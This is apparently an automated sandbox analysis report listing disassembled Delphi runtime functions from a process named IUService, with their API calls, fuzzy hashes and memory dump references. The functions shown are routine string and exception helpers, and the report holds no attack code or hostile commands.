                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Char$qqrr20FromStringb$Cat3$qqrr20Except$qqrvException@$bctr$qqrp20RaiseStringStringt2Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1860790855-0
                                                                                                                                            • Opcode ID: caeef3e0a6f3d13820a5c3a4a28f008e23b8d367d4d1577ca5722a4c6e0df794
                                                                                                                                            • Instruction ID: c00f10eb4ef58a00c0e347cc1ac883bdfb410f2ed051d6b945eaac8d7ac344f1
                                                                                                                                            • Opcode Fuzzy Hash: caeef3e0a6f3d13820a5c3a4a28f008e23b8d367d4d1577ca5722a4c6e0df794
                                                                                                                                            • Instruction Fuzzy Hash: EE1126716053C49BFB10DAA4ECD1BDFB39AEF48310F604277FA4083745D9B99E804691
                                                                                                                                            Function 5002B9E8 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5002B9FE
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA29
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA24
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA4C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA51
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002BA5D
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002BA77
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$Sysutils@$RaiseRecxiUnicode$Except$qqrvException@$bctr$qqrp20Recpx14$ArrayAsg$qqrr20Builder@set_ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqriLength$qqrvList$qqrvLoadMetaMove$qqrpxvpviString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2784925796-0
                                                                                                                                            • Opcode ID: 1667041f6e4c4e04a8d4a2e82b0d72eb47a86ad2971957d0b5d070b1c05cbe15
                                                                                                                                            • Instruction ID: cb949063882ccfe4f8492ee94f7a12960d0db32fb565db7cba8276b964dc1cb1
                                                                                                                                            • Opcode Fuzzy Hash: 1667041f6e4c4e04a8d4a2e82b0d72eb47a86ad2971957d0b5d070b1c05cbe15
                                                                                                                                            • Instruction Fuzzy Hash: 6C118630A025859BD710DFACFD81AADB7B9AF54318F5482AAE904DB352DA719D048BD0
                                                                                                                                            Function 5001A43C Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A474
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A480
                                                                                                                                            • CharUpperBuffW.USER32(?,?,00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A490
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A49C
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4A7
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4B2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Wide$FromUnicode$CharUpper$AnsiBuffCase$qqrx20Char$qqrx17Len$qqrr17Str$qqrr17Str$qqrr20StringpbiStringx17Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 534983715-0
                                                                                                                                            • Opcode ID: 5d27df0171de173af17c0cc5cb6ee76833d8b56f58fc8406f40f8d3b55e42c42
                                                                                                                                            • Instruction ID: 33202aa56892b5c3d98ea78cec372edfaed5d9f2320c7c772028933169ede13c
                                                                                                                                            • Opcode Fuzzy Hash: 5d27df0171de173af17c0cc5cb6ee76833d8b56f58fc8406f40f8d3b55e42c42
                                                                                                                                            • Instruction Fuzzy Hash: D711A530B01794ABEB10CBE8DD51B9DB3E8DB9A200F908672F900E3741D774DE458794
                                                                                                                                            Function 5001A4E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A518
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A524
                                                                                                                                            • CharLowerBuffW.USER32(?,?,00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A534
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A540
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A54B
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A556
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Wide$FromUnicode$CharLower$AnsiBuffCase$qqrx20Char$qqrx17Len$qqrr17Str$qqrr17Str$qqrr20StringpbiStringx17Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 176228272-0
                                                                                                                                            • Opcode ID: 644b9fb92c3d6ef07a5067c8370350d292bcda6fbce292a46e7a1feb9069b290
                                                                                                                                            • Instruction ID: d20671b8514017f2aeb96368901a0b64a7eab2f548f792ed05b88fe4d05113d0
                                                                                                                                            • Opcode Fuzzy Hash: 644b9fb92c3d6ef07a5067c8370350d292bcda6fbce292a46e7a1feb9069b290
                                                                                                                                            • Instruction Fuzzy Hash: D0115230B05694ABEB10CBA8DD51B9DB7E9EB4A600FD146B2F900E7341DA30DE458A94
                                                                                                                                            Function 5000A89C Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A8A6
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A8B2
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8C9
                                                                                                                                            • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8EC
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A91E
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A92C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$StringSystem@Unicode$ArrayLength$qqrr20Length$qqrvStringiU$qqrr20Unique$AnsiClr$qqrpvFromMem$qqrrpviReallocStr$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 63268518-0
                                                                                                                                            • Opcode ID: d8794426dce69a8afdf5edacf3f7190b1c801e4214ab63c3ffaa2eb2339d506f
                                                                                                                                            • Instruction ID: 589278789b040e58112a918f3487c0d04965380cb2fd0c6ea7f3740b3ad11151
                                                                                                                                            • Opcode Fuzzy Hash: d8794426dce69a8afdf5edacf3f7190b1c801e4214ab63c3ffaa2eb2339d506f
                                                                                                                                            • Instruction Fuzzy Hash: 2001DD103125694EE3117FAE9851BBBB2D6DFF22117818336F145C763ADFA84946C2C0
                                                                                                                                            Function 5002A448 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 5002A3F8: @Sysutils@HashName$qqrpc.RTL120 ref: 5002A412
                                                                                                                                              • Part of subcall function 5000E884: GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                                                              • Part of subcall function 5000E884: @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                                                            • @Sysutils@GetModuleName$qqrui.RTL120(?,Initialize,00000000,5002A4DD), ref: 5002A48C
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4A9
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4B8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4BD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Sysutils@$System@@$AddressClr$qqrpvExcept$qqrvException@$bctr$qqrx20HashLoadModuleName$qqrpcName$qqruiProcRaiseRecxiStringString$qqrp20Stringpx14Unicode
                                                                                                                                            • String ID: Initialize
                                                                                                                                            • API String ID: 1682061199-2538663250
                                                                                                                                            • Opcode ID: ab808db70563f3f0fa6552d98e969f741daa7b01a3021ac412289ab684d2b595
                                                                                                                                            • Instruction ID: 46ff4c201679bb6a9b3a02cb542a9fa2f8a22491ac8c3f2d76804c6127a1f597
                                                                                                                                            • Opcode Fuzzy Hash: ab808db70563f3f0fa6552d98e969f741daa7b01a3021ac412289ab684d2b595
                                                                                                                                            • Instruction Fuzzy Hash: EC11C875A066995FD714EBE8FC5199EB7B8EF99300F80466AF814D3341DE74990086A0
                                                                                                                                            Function 50031010 Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(?,?,?,500310B6,50030FEB), ref: 5003103A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Check$qqrlClearClr$qqrpvResultSystem@@VariantVariants@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 452420788-0
                                                                                                                                            • Opcode ID: eb70d2b8eab186a06ea140340b4e8703a8d7132057e564f3d20b5dcbcbd0fb7d
                                                                                                                                            • Instruction ID: 52db8ca31b00b2e44e7104484223e2f8e7d0f429c131b9206ee594ad239fc269
                                                                                                                                            • Opcode Fuzzy Hash: eb70d2b8eab186a06ea140340b4e8703a8d7132057e564f3d20b5dcbcbd0fb7d
                                                                                                                                            • Instruction Fuzzy Hash: 9D01D4117061D08E9B2EBB74E8955DE27DA9F5C200F685B73F004AB127CBF98CC583A2
                                                                                                                                            Function 5002C12C Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C13F
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C165
                                                                                                                                            • @Strutils@MidStr$qqrx17System@WideStringxixi.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C174
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C17F
                                                                                                                                            • @Sysutils@TStringBuilder@$bctr$qqrx20System@UnicodeStringi.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C18B
                                                                                                                                            • @System@@WStrArrayClr$qqrpvi.RTL120(5002C1BA,?,?,?,00000000,00000000,00000000), ref: 5002C1A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicodeWide$From$ArrayBuilder@$bctr$qqrx20ClassClassoClr$qqrpviCreate$qqrp17MetaStr$qqrr17Str$qqrr20Str$qqrx17StringiStringx17Stringx20StringxixiStrutils@Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3564302108-0
                                                                                                                                            • Opcode ID: a080771f1c208bee87336802870a022ba774bc40fe05722359fd5bb0d4ea6352
                                                                                                                                            • Instruction ID: 58922c8f4528d5c8cfb5e260768a024238476e9fd86c34fd90099dd993f29032
                                                                                                                                            • Opcode Fuzzy Hash: a080771f1c208bee87336802870a022ba774bc40fe05722359fd5bb0d4ea6352
                                                                                                                                            • Instruction Fuzzy Hash: B1019231A01549ABDB15CB94EC92EDEB7B9DF89710FA08263F90497291DB30AE118690
                                                                                                                                            Function 50028934 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@StrNew$qqrpxc.RTL120 ref: 50028947
                                                                                                                                            • @Sysutils@StrLower$qqrpc.RTL120 ref: 5002894C
                                                                                                                                            • @Sysutils@StrNew$qqrpxc.RTL120(00000000,500289AE), ref: 50028964
                                                                                                                                              • Part of subcall function 5001DFD8: @Sysutils@StrLen$qqrpxc.RTL120(?,?,5002894C), ref: 5001DFE7
                                                                                                                                              • Part of subcall function 5001DFD8: @Sysutils@AnsiStrAlloc$qqrui.RTL120(?,?,5002894C), ref: 5001DFF1
                                                                                                                                              • Part of subcall function 5001DFD8: @Sysutils@StrMove$qqrpcpxcui.RTL120(?,?,5002894C), ref: 5001DFFA
                                                                                                                                            • @Sysutils@StrLower$qqrpc.RTL120(00000000,500289AE), ref: 50028969
                                                                                                                                            • @Sysutils@StrPos$qqrpxct1.RTL120(00000000,500289AE), ref: 50028977
                                                                                                                                            • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A0
                                                                                                                                            • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$Dispose$qqrpcLower$qqrpcNew$qqrpxc$Alloc$qqruiAnsiLen$qqrpxcMove$qqrpcpxcuiPos$qqrpxct1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3159898584-0
                                                                                                                                            • Opcode ID: 65390a648ab706a9b4138e702ec1e558a2639dcf986a1068156ad4c86a6bf754
                                                                                                                                            • Instruction ID: 6b6a953f60cceed264f0bcce53d0f64a15a6626de01668e467ade48e568e826d
                                                                                                                                            • Opcode Fuzzy Hash: 65390a648ab706a9b4138e702ec1e558a2639dcf986a1068156ad4c86a6bf754
                                                                                                                                            • Instruction Fuzzy Hash: 58012C71A12A88AFCB01DFF8EC4159DBBF5EF49200F5186BAF414E3241D6345E82CB91
                                                                                                                                            Function 500289C0 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@StrNew$qqrpxb.RTL120 ref: 500289D3
                                                                                                                                            • @Sysutils@StrLower$qqrpb.RTL120 ref: 500289D8
                                                                                                                                              • Part of subcall function 5001DF24: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289DD), ref: 5001DF2C
                                                                                                                                            • @Sysutils@StrNew$qqrpxb.RTL120(00000000,50028A3A), ref: 500289F0
                                                                                                                                              • Part of subcall function 5001E004: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289D8), ref: 5001E013
                                                                                                                                              • Part of subcall function 5001E004: @Sysutils@WideStrAlloc$qqrui.RTL120(?,?,500289D8), ref: 5001E01D
                                                                                                                                              • Part of subcall function 5001E004: @Sysutils@StrMove$qqrpbpxbui.RTL120(?,?,500289D8), ref: 5001E026
                                                                                                                                            • @Sysutils@StrLower$qqrpb.RTL120(00000000,50028A3A), ref: 500289F5
                                                                                                                                            • @Sysutils@StrPos$qqrpxbt1.RTL120(00000000,50028A3A), ref: 50028A03
                                                                                                                                            • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A2C
                                                                                                                                            • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A34
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
